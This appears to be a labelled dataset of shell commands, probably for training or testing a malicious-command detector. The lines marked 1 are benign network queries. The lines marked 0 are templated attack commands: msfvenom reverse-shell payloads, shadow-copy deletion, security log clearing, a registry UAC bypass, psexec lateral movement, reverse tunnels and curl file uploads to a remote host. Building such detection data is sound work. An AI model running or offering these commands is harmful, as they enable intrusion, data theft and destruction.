1	arp -a
1	cmd /c "arp -a"
1	powershell -c "arp -a"
1	arp.exe -a
1	cmd /c "arp.exe -a"
1	powershell -c "arp.exe -a"
1	arp -g
1	cmd /c "arp -g"
1	powershell -c "arp -g"
1	arp.exe -g
1	cmd /c "arp.exe -g"
1	powershell -c "arp.exe -g"
1	ipconfig
1	cmd /c "ipconfig"
1	powershell -c "ipconfig"
1	ipconfig.exe
1	cmd /c "ipconfig.exe"
1	powershell -c "ipconfig.exe"
1	netstat
1	cmd /c "netstat"
1	powershell -c "netstat"
1	netstat.exe
1	cmd /c "netstat.exe"
1	powershell -c "netstat.exe"
1	netstat -a
1	cmd /c "netstat -a"
1	powershell -c "netstat -a"
1	netstat.exe -a
1	cmd /c "netstat.exe -a"
1	powershell -c "netstat.exe -a"
1	netstat -q
1	cmd /c "netstat -q"
1	powershell -c "netstat -q"
1	netstat.exe -q
1	cmd /c "netstat.exe -q"
1	powershell -c "netstat.exe -q"
1	netstat -r
1	cmd /c "netstat -r"
1	powershell -c "netstat -r"
1	netstat.exe -r
1	cmd /c "netstat.exe -r"
1	powershell -c "netstat.exe -r"
1	netstat -f
1	cmd /c "netstat -f"
1	powershell -c "netstat -f"
1	netstat.exe -f
1	cmd /c "netstat.exe -f"
1	powershell -c "netstat.exe -f"
1	ipconfig /all
1	cmd /c "ipconfig /all"
1	powershell -c "ipconfig /all"
1	ipconfig.exe /all
1	cmd /c "ipconfig.exe /all"
1	powershell -c "ipconfig.exe /all"
1	ipconfig /renew
1	cmd /c "ipconfig /renew"
1	powershell -c "ipconfig /renew"
1	ipconfig.exe /renew
1	cmd /c "ipconfig.exe /renew"
1	powershell -c "ipconfig.exe /renew"
1	ipconfig /allcompartments
1	cmd /c "ipconfig /allcompartments"
1	powershell -c "ipconfig /allcompartments"
1	ipconfig.exe /allcompartments
0	powershell -c "mstsc.exe /v:${ip_address} /f /remoteGuard"
0	sdelete.exe -s -q ${local_file_path}
0	plink.exe -ssh -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N
0	cmd /c "7z a ${destination_file_path} ${source_file_path} -p${password}"
0	rm -rf ${local_file_path} 2> error.log
0	powershell -c "mstsc.exe /v:${ip_address} /f /remoteGuard"
0	Psexec64 \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}
0	rm -fr ${local_file_path} 2> /dev/null
0	echo ${email_content} | mutt -s ${email_subject} ${username}@${domain} -a attachement.txt 2> error.log
0	powershell -c "msfvenom -p windows/meterpreter/reverse_http LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	cat email.txt | mail -s ${email_subject} ${username}@${domain} 2> /dev/null
0	echo ${email_content} | mail -s ${email_subject} ${username}@${domain} 2> error.log
0	cat email.txt | mutt -s ${email_subject} ${username}@${domain} 2> &1
0	powershell -c "plink.exe -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}"
0	plink -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}
0	vssadmin Delete Shadows /all /quiet
0	mailx -s ${email_subject} ${username}@${domain} < mail.txt 2> /dev/null
0	nmap -A ${ip_address}
0	cmd /c "certutil -encode -UnicodeText -v error.txt encode.txt"
0	psexec.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute} -d
0	cmd /c "psexec.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute} -d"
0	msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	msfvenom -p windows/meterpreter_reverse_tcp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	reg add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /f
0	cmd /c "7z a -slt -p${password} ${destination_file_path} ${source_file_path}"
0	cmd /c "msfvenom -p windows/x64/meterpreter/reverse_http LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	cmd /c "choco install rclone"
0	certutil -encode -gmt -v error.txt encode.txt
0	cmd /c "certutil -encode -Unicode -v -f error.txt encode.txt"
0	powershell -c "vssadmin delete shadows /all /quiet"
0	powershell -c "plink -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}"
0	powershell -c "sc.exe stop ${service_name}"
0	cmd /c "certutil -encode -gmt ${source_file_path} ${destination_file_path}"
0	cmd /c "sdelete.exe -accepteula ${local_file_path}"
0	cmd /c "choco install 7zip"
0	cmd /c "sdelete.exe -s -accepteula ${local_file_path}"
0	plink.exe -ssh ${username}@${ip_address} -P ${remote_port} -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N
0	cat email.txt | mutt -s ${email_subject} ${username}@${domain} 2> &1
0	cat email.txt | ssmtp ${username}@${domain}
0	powershell -c "wmic.exe os get Name"
0	cmd /c "7z.exe a -p${password} ${destination_file_path} ${source_file_path}"
0	powershell -c "certutil -encode -Unicode -v -f error.txt encode.txt"
0	plink -ssh -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N
0	powershell -c "taskkill /F /im ${process_name}"
0	sdelete -f -q ${local_file_path}
0	powershell -c "certutil -encode -UnicodeText -gmt error.txt encode.txt"
0	curl -X POST -H -F file=@${source_file_path} http://${ip_address}:${port}/upload
0	plink -ssh ${username}@${ip_address} -P ${remote_port} -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N
0	7z.exe a -slp -p ${destination_file_path} ${source_file_path}
0	cat email.txt | mutt -s ${email_subject} ${username}@${domain} 2> error.log
0	powershell -c "wevtutil cl security"
0	powershell -c "choco install ngrok"
0	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain}
0	powershell -c "sdelete ${local_file_path}"
0	powershell -c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_MULTI_SZ"
0	cmd /c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
0	powershell -c "taskkill /f /IM ${process_name}"
0	powershell -c "curl -v -X POST -F file=@${source_file_path} http://${ip_address}:${port}/upload"
0	cmd /c "sdelete -f -accepteula ${local_file_path}"
0	cmd /c "sdelete.exe -f -q -accepteula ${local_file_path}"
0	cmd /c "del /p /q ${local_file_path}"
0	vssadmin create shadow /for=C:
0	cmd /c "mstsc.exe /v:${ip_address} /multimon"
0	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d
